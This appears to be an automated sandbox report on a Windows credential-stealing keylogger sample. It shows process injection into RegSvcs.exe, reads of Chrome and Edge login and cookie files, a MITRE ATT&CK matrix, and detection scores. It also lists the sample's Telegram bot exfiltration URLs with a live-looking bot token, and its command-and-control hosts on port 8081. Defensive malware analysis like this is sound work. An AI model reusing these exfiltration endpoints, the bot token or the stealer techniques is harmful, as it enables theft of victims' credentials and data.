                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: RegSvcs.exe, 00000002.00000002.4602611694.0000000001357000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd32545f3d1fd1<
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | API call chain: ExitProcess graph end node graph_0-101113
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00393F09 BlockInput,0_2_00393F09
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00323B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00323B3A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00355A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00355A7C
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00324B37 LoadLibraryA,GetProcAddress,0_2_00324B37
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_01239430 mov eax, dword ptr fs:[00000030h] 0_2_01239430
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0123AA60 mov eax, dword ptr fs:[00000030h] 0_2_0123AA60
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0123AAC0 mov eax, dword ptr fs:[00000030h] 0_2_0123AAC0
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_003780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003780A9
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0034A124 SetUnhandledExceptionFilter,0_2_0034A124
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0034A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0034A155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F43008
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_003787B1 LogonUserW,0_2_003787B1
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00323B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00323B3A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_003248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003248D7
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00384C27 mouse_event,0_2_00384C27
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\19d6P55zd1.exe"
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00377CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00377CAF
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0037874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0037874B
                  Source: 19d6P55zd1.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: 19d6P55zd1.exe | Binary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0034862B cpuid 0_2_0034862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00354E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00354E87
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00361E06 GetUserNameW,0_2_00361E06
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00353F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00353F3A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_003249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003249A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 19d6P55zd1.exe | Binary or memory string: WIN_81
                  Source: 19d6P55zd1.exe | Binary or memory string: WIN_XP
                  Source: 19d6P55zd1.exe | Binary or memory string: WIN_XPe
                  Source: 19d6P55zd1.exe | Binary or memory string: WIN_VISTA
                  Source: 19d6P55zd1.exe | Binary or memory string: WIN_7
                  Source: 19d6P55zd1.exe | Binary or memory string: WIN_8
                  Source: 19d6P55zd1.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR
Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00396283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00396747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (a number in parentheses is the count of signatures matched for that technique; cells without a number had no match):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (2) | Native API (1) | DLL Side-Loading (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (11) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Web Service (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1) |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Valid Accounts (2) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (21) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Ingress Tool Transfer (4) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Valid Accounts (2) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (1) | SMB/Windows Admin Shares | Email Collection (1) | Encrypted Channel (11) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Access Token Manipulation (21) | DLL Side-Loading (1) | NTDS | System Information Discovery (127) | Distributed Component Object Model | Input Capture (21) | Non-Application Layer Protocol (4) | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (212) | Valid Accounts (2) | LSA Secrets | Security Software Discovery (131) | SSH | Clipboard Data (3) | Application Layer Protocol (15) | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Virtualization/Sandbox Evasion (11) | Cached Domain Credentials | Virtualization/Sandbox Evasion (11) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Access Token Manipulation (21) | DCSync | Process Discovery (2) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Process Injection (212) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

| Source | Detection | Scanner | Label |
| 19d6P55zd1.exe | 69% | Virustotal | |
| 19d6P55zd1.exe | 76% | ReversingLabs | Win32.Ransomware.VIPKeylogger |
| 19d6P55zd1.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| reallyfreegeoip.org | 104.21.112.1 | true | false | | high |
| api.telegram.org | 149.154.167.220 | true | false | | high |
| checkip.dyndns.com | 132.226.247.73 | true | false | | high |
| checkip.dyndns.org | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
| https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2011/01/2025%20/%2003:42:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high |
| http://checkip.dyndns.org/ | false | | high |
| https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146433139&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
| https://www.office.com/ | RegSvcs.exe, 00000002.00000002.4603067666.000000000327B000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org | RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot | RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.office.com/lB | RegSvcs.exe, 00000002.00000002.4603067666.0000000003285000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://checkip.dyndns.org | RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000002.00000002.4603067666.0000000003259000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000328A000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://varders.kozow.com:8081 | 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high |
| http://aborters.duckdns.org:8081 | 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high |
| https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146 | RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://anotherarmy.dns.army:8081 | 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20a | RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://checkip.dyndns.org/q | 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high |
| https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000002.00000002.4603067666.0000000003254000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://reallyfreegeoip.org/xml/8.46.123.189$ | RegSvcs.exe, 00000002.00000002.4603067666.0000000003180000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000313B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.4603067666.0000000003180000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://api.telegram.org | RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp | false | | high |
